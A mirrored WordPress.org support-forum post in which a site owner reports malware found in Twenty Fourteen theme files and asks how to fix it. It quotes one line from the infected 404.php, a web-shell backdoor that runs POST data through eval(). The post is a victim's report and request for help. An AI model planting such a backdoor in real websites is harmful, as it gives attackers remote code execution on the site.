Quantcast
Channel: Topic Tag: malware | WordPress.org
Viewing all articles
Browse latest Browse all 3861

HARVS1789UK on "[Theme: Twenty Fourteen] Malware Detected in Theme Files"

$
0
0

My hosting provider (WebFactional - ) has notified me of a number of security issues with my Wordpress based website which is using the twentyfourteen theme.

3 of the 5 effected files are part of the twentyfourteen theme:

wp-content/themes/twentyfourteen/images/file.php
wp-content/themes/twentyfourteen/404.php
wp-content/themes/twentyfourteen/css/test77.php

All of these files seem to contain PHP's eval() function on one or more occasion, the 404 page even passes POST data to eval() ! "eval($_POST['p1']);" That sounds like the worst possible idea anyone could have had? Surly that means an attacker can pass malicious PHP code in POST data and have it execute on my website!

Can you please investigate these 3 files and the security risks my hosting provider has identified and provide me with an update as to how I can patch these issues.

Kind regards,

HARVS1789UK


Viewing all articles
Browse latest Browse all 3861

Trending Articles



<script src="https://jsc.adskeeper.com/r/s/rssing.com.1596347.js" async> </script>